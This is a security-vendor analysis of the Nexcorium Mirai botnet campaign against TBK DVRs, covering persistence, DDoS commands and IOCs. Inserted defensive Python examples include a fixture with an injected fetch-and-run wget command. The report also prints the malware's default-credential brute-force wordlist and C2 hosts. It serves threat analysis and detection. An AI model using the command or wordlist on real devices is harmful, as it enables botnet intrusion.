Tracking Mirai Variant Nexcorium: A Vulnerability-Driven IoT Botnet Campaign
Published 2026-4-17 13:0:0 | Author: feeds.fortinet.com

Affected Platforms: TBK DVR-4104, DVR-4216
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High

IoT devices are increasingly prime targets for large-scale attacks due to their widespread use, lack of patching, and often weak security settings. Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks.

FortiGuard Labs has analyzed a recent campaign exploiting CVE-2024-3721 in TBK DVR devices to deliver a multi-architecture Mirai variant called Nexcorium. By examining the infection chain, persistence mechanisms, and attack capabilities, we offer insights into the operational behavior of the associated threat actor and its potential impact on targeted environments.

Incidents

The threat actors delivered a downloader script by exploiting CVE-2024-3721, an OS command injection vulnerability in TBK DVR devices through manipulation of the mdb / mdc arguments.

Figure 1: Exploit traffic via CVE-2024-3721

The exploit features a custom HTTP header, “X-Hacked-By,” with the value “Nexus Team – Exploited By Erratic.” Based on this artifact, we think the activity is likely linked to a threat actor, which we suggest identifying as “Nexus Team.” However, this actor is not widely known.
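A detection check for the exploit traffic described above, written as an added example (not code from the report or from Fortinet): it flags requests whose mdb/mdc parameters carry shell metacharacters and requests bearing the X-Hacked-By header. The request lines are constructed samples; the endpoint path and download host are placeholders, not values from the campaign.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters that have no legitimate place inside a DVR's mdb/mdc parameters.
SHELL_META = re.compile(r"[;|`&]|\$\(")

# Constructed sample requests (not real captures). The endpoint path and the
# download host are placeholders; the mdb/mdc parameters and the X-Hacked-By
# header follow the exploit traffic described in the report.
SAMPLE_REQUESTS = [
    {"line": "GET /example-endpoint?mdb=sos&mdc=cd%20/tmp%3Bwget%20http://203.0.113.5/dvr%3Bsh%20dvr HTTP/1.1",
     "headers": {"Host": "dvr.example", "X-Hacked-By": "Nexus Team - Exploited By Erratic"}},
    {"line": "GET /example-endpoint?mdb=sos&mdc=normalvalue HTTP/1.1",
     "headers": {"Host": "dvr.example"}},
    {"line": "GET /index.html HTTP/1.1", "headers": {"Host": "dvr.example"}},
]

def classify_request(req):
    """Return the detection reasons for one request; an empty list means clean."""
    reasons = []
    target = req["line"].split(" ")[1]
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name in ("mdb", "mdc"):
        for value in params.get(name, []):  # values are percent-decoded here
            if SHELL_META.search(value):
                reasons.append(f"shell metacharacter in {name} parameter")
    headers = {k.lower(): v for k, v in req["headers"].items()}
    marker = headers.get("x-hacked-by")
    if marker is not None:
        reasons.append("X-Hacked-By header present")
        if "nexus team" in marker.lower():
            reasons.append("Nexus Team campaign marker")
    return reasons

def scan(requests):
    """Return (request target, reasons) for every request that trips a rule."""
    hits = []
    for req in requests:
        reasons = classify_request(req)
        if reasons:
            hits.append((req["line"].split(" ")[1], reasons))
    return hits

if __name__ == "__main__":
    for target, reasons in scan(SAMPLE_REQUESTS):
        print(target, "->", "; ".join(reasons))
```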

The downloader script, called dvr, fetches malware samples with filenames starting with nexuscorp and targets multiple Linux architectures, including ARM, MIPS R3000, and x86-64 (AMD64). The script sets the permissions of the retrieved malware to 777 and runs it with an argument that indicates the exploited device on the victim host.

Figure 2: Downloader shell script “dvr”

Malware Analysis

This analysis is based on the “nexuscorp.x86” sample. Upon execution, the malware shows the string “nexuscorp has taken control.”

Figure 3: Display string after execution

Like other Mirai variants, Nexcorium initializes an XOR-encoded configuration table and includes a watchdog module and a DDoS attack module.

The malware first performs XOR decoding to extract its embedded configuration, which includes C2 server domain and port, persistence-related shell commands, a hard-coded brute-force wordlist, DDoS attack commands retrieved from the C2 server, and embedded exploit code.

Figure 4: XOR-Encoded configuration with the key 0x13

Figure 5: XOR-Encoded configuration with the key 0xFD
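An added analysis helper (not code from the report) for the single-byte XOR table encoding described above, using the two keys the report names, 0x13 and 0xFD. The encoded tables are constructed here from strings the report attributes to Nexcorium, not bytes lifted from the binary, and the table IDs are arbitrary; recover_keys goes one step beyond the report by listing every key under which a blob decodes to printable text, which is how an analyst confirms a key when it is not yet known.

```python
import string

# Bytes accepted as "plausible decoded text": printable ASCII minus vertical tab and form feed.
PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}

def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte, the encoding Mirai-style config tables use."""
    return bytes(b ^ key for b in data)

def decode_table(table: dict, key: int) -> dict:
    """Decode an {id: encoded_bytes} table with a known single-byte key."""
    return {tid: xor_bytes(blob, key).decode("ascii", "replace") for tid, blob in table.items()}

def recover_keys(blob: bytes) -> list:
    """All single-byte keys under which `blob` decodes to printable text."""
    return [k for k in range(256) if blob and all(b in PRINTABLE for b in xor_bytes(blob, k))]

# Constructed sample tables (not bytes from the real binary). The plaintexts are
# values the report attributes to Nexcorium; the IDs are arbitrary.
PLAIN_0x13 = {1: b"r3brqw3d.b0ats.top", 2: b"/usr/local/bin/sysd", 3: b"NXS_WD_CHILD"}
PLAIN_0xFD = {4: b"killattk", 5: b"botkill"}
TABLE_0x13 = {tid: xor_bytes(v, 0x13) for tid, v in PLAIN_0x13.items()}
TABLE_0xFD = {tid: xor_bytes(v, 0xFD) for tid, v in PLAIN_0xFD.items()}

if __name__ == "__main__":
    for tid, text in decode_table(TABLE_0x13, 0x13).items():
        print(f"key 0x13 id {tid}: {text}")
    for tid, text in decode_table(TABLE_0xFD, 0xFD).items():
        print(f"key 0xFD id {tid}: {text}")
    print("candidate keys for id 1:", [hex(k) for k in recover_keys(TABLE_0x13[1])])
```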

Nexcorium shares an architecture similar to other Mirai variants. It consists of three core modules: watchdog, scanner, and attacker. The watchdog component uses the string NXS_WD_CHILD as a sub-process role marker to distinguish watchdog-spawned child processes.

Figure 6: Watchdog subprocess role marker

Nexcorium performs self-integrity checks by first storing its command-line arguments in global variables and retrieving the current execution path from /proc/self/exe. It calculates the hash of the executable file using the FNV-1a algorithm. If the original file is missing, unreadable, or its hash does not match, the malware creates a duplicate under a different filename and sets the file permissions to 700.

Figure 7: Self-replication
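The self-integrity check above, reproduced as an added example (not the malware's code) so an analyst can recompute the hash of a captured sample and see the three outcomes the report describes. The 32-bit FNV-1a variant is an assumption, as the report does not state the width; the file contents in demo() are a constructed stand-in, not sample bytes.

```python
import os
import tempfile

FNV1A_32_OFFSET = 0x811C9DC5
FNV1A_32_PRIME = 0x01000193

def fnv1a_32(data: bytes) -> int:
    """32-bit FNV-1a: XOR each byte in, then multiply by the prime (mod 2**32)."""
    h = FNV1A_32_OFFSET
    for b in data:
        h = ((h ^ b) * FNV1A_32_PRIME) & 0xFFFFFFFF
    return h

def file_fnv1a(path: str):
    """Hash a file's contents; None if the file is missing or unreadable."""
    try:
        with open(path, "rb") as f:
            return fnv1a_32(f.read())
    except OSError:
        return None

def integrity_status(path: str, expected: int) -> str:
    """The three outcomes the report describes for the self-check."""
    actual = file_fnv1a(path)
    if actual is None:
        return "missing-or-unreadable"
    return "ok" if actual == expected else "mismatch"

def demo() -> dict:
    """Constructed scenario: an intact stand-in binary, a tampered copy, then deletion."""
    payload = b"constructed stand-in for the nexuscorp.x86 image"  # not real sample bytes
    expected = fnv1a_32(payload)
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "sysd")
        with open(path, "wb") as f:
            f.write(payload)
        intact = integrity_status(path, expected)
        with open(path, "ab") as f:
            f.write(b"\x00")  # one appended byte is enough to change the hash
        tampered = integrity_status(path, expected)
        os.remove(path)
        gone = integrity_status(path, expected)
    return {"intact": intact, "tampered": tampered, "missing": gone}
```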

Notably, the malware includes an exploit for CVE-2017-17215, targeting Huawei HG532 devices. This is also commonly seen in other Mirai variants.

Figure 8: XOR-Encoded CVE-2017-17215 exploit

The exploit is stored in table ID 23 and used in the scanner component. Once Nexcorium connects to the victim host, the module looks up the table, retrieves the CVE-2017-17215 payload, and sends a malicious packet.

Figure 9: Send CVE-2017-17215 exploit if the socket is established

Additionally, the malware contains a hard-coded username and password list used for brute-force attacks. Most entries include default credentials.

ubuntu guest support default
12345 123456 changeme hikvision
operator 888888 Administrator meinsm
7ujMko0admin admin123 admin1234 admintest
comcomcom motorola password daemon
OxhlwSG8 S2fGqNFs tlJwpbo6 D-Link
netscreen 7ujMko0vizxv GM8182 Root1
Zte521 antslq cat1029 dreambox
grouter hg2x0 huigu309 ipcam_rt5350
jauntech solokey swsbzkgn taZz@23495859
tsgoingon vertex25ektks123 xc3511 xmhdipc
Zhongxing telnet telnetadmin

The scanner opens a Telnet connection to candidate hosts and then starts a brute-force attack using the wordlist above. If Nexcorium successfully logs in, it executes commands to check whether it has obtained a shell, including system, shell, sh, and cat /bin/busybox.

Figure 10: Execute shell command if Nexcorium successfully logs in via telnet

Once Nexcorium executes the command, it will parse and verify the victim host’s architecture using its hard-coded list.

Figure 11: Parsing the architecture information response from the victim host

The malware retrieves the actual execution path from /proc/self/exe again for persistence purposes. If it is not running from /usr/local/bin/, it copies itself to /usr/local/bin/sysd and proceeds to establish persistence through multiple mechanisms.

1. Init configuration

It updates /etc/inittab to make sure the process restarts if it stops.

Figure 12: Persistence method via /etc/inittab

2. Startup script

It creates or updates /etc/rc.local to ensure execution at system startup.

Figure 13: Persistence method via /etc/rc.local

3. Systemd service

It then checks common system paths (e.g., /bin/systemctl, /usr/bin/systemctl, and /etc/system/system) and creates a service file at /etc/systemd/system/persist.service, enabling it to run automatically at startup.

Figure 14: Persistence method via creating daemon

4. Cron job

It creates a scheduled task using crontab to ensure it runs after reboot.

Figure 15: Persistence method using crontab

After completing the persistence setup, the malware deletes its original binary from the current execution path to evade analysis.

Figure 16: Self-delete to evade analysis
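A host audit for the four persistence mechanisms above, added here as an example (not Fortinet's code or a tool from the report). It greps the files the report names for the /usr/local/bin/sysd copy and the persist.service unit; the cron spool locations are an assumption, and build_fixture writes a constructed infected-host layout so the audit can be exercised offline.

```python
import os, glob, tempfile

# Artifacts the report names: the persistence copy and the systemd unit it creates.
MARKERS = ("/usr/local/bin/sysd", "persist.service")
# Files behind the four persistence mechanisms, relative to the filesystem root.
CHECKS = [("inittab", "etc/inittab"), ("rc.local", "etc/rc.local"),
          ("systemd unit", "etc/systemd/system/persist.service"), ("system crontab", "etc/crontab")]
# Assumed locations of per-user and drop-in cron entries (not named in the report).
CRON_GLOBS = ["var/spool/cron/*", "var/spool/cron/crontabs/*", "etc/cron.d/*"]

def grep_markers(path):
    """Lines of `path` that reference a known artifact; [] if the file is absent."""
    try:
        with open(path, errors="replace") as f:
            return [ln.rstrip("\n") for ln in f if any(m in ln for m in MARKERS)]
    except OSError:
        return []

def audit_persistence(root="/"):
    """Return (mechanism, path, evidence) tuples; run with root='/' on a live host."""
    findings = []
    for label, rel in CHECKS:
        path = os.path.join(root, rel)
        if label == "systemd unit" and os.path.isfile(path):
            findings.append((label, path, "unit file present"))
        findings += [(label, path, hit) for hit in grep_markers(path)]
    for pattern in CRON_GLOBS:
        for path in glob.glob(os.path.join(root, pattern)):
            findings += [("user crontab", path, hit) for hit in grep_markers(path)]
    binary = os.path.join(root, "usr/local/bin/sysd")
    if os.path.isfile(binary):
        findings.append(("binary", binary, "persistence copy present"))
    return findings

def build_fixture(root):
    """Constructed infected-host layout for offline testing (illustrative, not victim files)."""
    files = {"etc/inittab": "id:3:initdefault:\nnxs::respawn:/usr/local/bin/sysd\n",
             "etc/rc.local": "#!/bin/sh\n/usr/local/bin/sysd &\nexit 0\n",
             "etc/systemd/system/persist.service": "[Service]\nExecStart=/usr/local/bin/sysd\n",
             "var/spool/cron/crontabs/root": "@reboot /usr/local/bin/sysd\n"}
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(body)

def demo():
    """Build the fixture in a temporary directory and audit it."""
    root = tempfile.mkdtemp()
    build_fixture(root)
    return audit_persistence(root)
```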

Based on the XOR-decoded configuration, Nexcorium supports multiple DDoS attack methods, including UDP flood, TCP ACK flood, TCP SYN flood, TCP generic flood, SMTP flood, TCP PSH flood, TCP URG Flag flood, UDP blast flood, and VSE query flood. It can stop ongoing DDoS attacks and terminate its own process as well.

Command   Attack ID   Description
udp       0           UDP Flood
ack       10          TCP ACK Flood
syn       3           TCP SYN Flood
std       4           TCP Generic Flood
stmp      9           SMTP Flood
psh       5           TCP PSH Flood
synd      7           TCP SYN Flood Variant
urg       6           TCP URG Flag Flood
udb       8           UDP Blast Flood
vse       1           VSE Query Flood
tcpa      12          TCP ACK + PSH Flood
killattk  -           Stop Attack
botkill   -           Kill Bot

The malware initializes its attack modules by allocating an array and adding the offset of each attack module to it. It then establishes a connection with the C2 domain r3brqw3d[.]b0ats[.]top and parses commands retrieved from the C2 server to launch subsequent attacks.

Figure 17: Attack method to parse commands from the C2 server

Conclusion

The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems. Its use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and efficacy in increasing its infection reach.

Additionally, its diverse range of DDoS attack vectors and centralized command-and-control communication indicate its primary role in coordinated attack campaigns. The use of customized exploit artifacts, such as the “X-Hacked-By” header, also provides valuable clues linking the activity to the suspected threat actor.

The continuous monitoring of vulnerability exploitation trends, along with proactive detection of malicious traffic and behavior patterns, remains essential for reducing similar threats targeting IoT and networked systems.

Fortinet Protections

The malware described in this report is detected and blocked by FortiGuard Antivirus as:

BASH/Mirai.AEH!tr.dldr
ELF.Mirai.ATL!tr
ELF/Nexcorium.A!tr
ELF/Mirai.EGX!tr

The FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running these products with up-to-date signatures are protected against the malware components described in this report.

The FortiGuard Web Filtering Service blocks the C2 server.

FortiGuard Labs provides an IPS signature against attacks exploiting the following vulnerabilities:

CVE-2024-3721: 55717 TBK.DVR.SOSTREAMAX.Command.Injection

Organizations seeking to strengthen foundational security awareness might also consider completing Fortinet Certified Fundamentals (FCF) training in Cybersecurity. This module is designed to help end users learn how to identify and protect themselves from phishing attacks.

The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with this campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT collaborations, MITRE, trusted industry partners, and other intelligence sources.

If you believe this or any other cybersecurity threat has impacted your organization, contact our Global FortiGuard Incident Response Team for assistance.

IOCs

Hosts

84[.]200[.]87[.]36
176[.]65[.]148[.]186
r3brqw3d[.]b0ats[.]top

Files

Downloader
696aeb6321313919f0a41a520e6fa715450bbfb271a9add1e54efe16484a9c35

Nexcorium


Source: https://feeds.fortinet.com/~/953946956/0/fortinet/blog/threat-research~Tracking-Mirai-Variant-Nexcorium-A-VulnerabilityDriven-IoT-Botnet-Campaign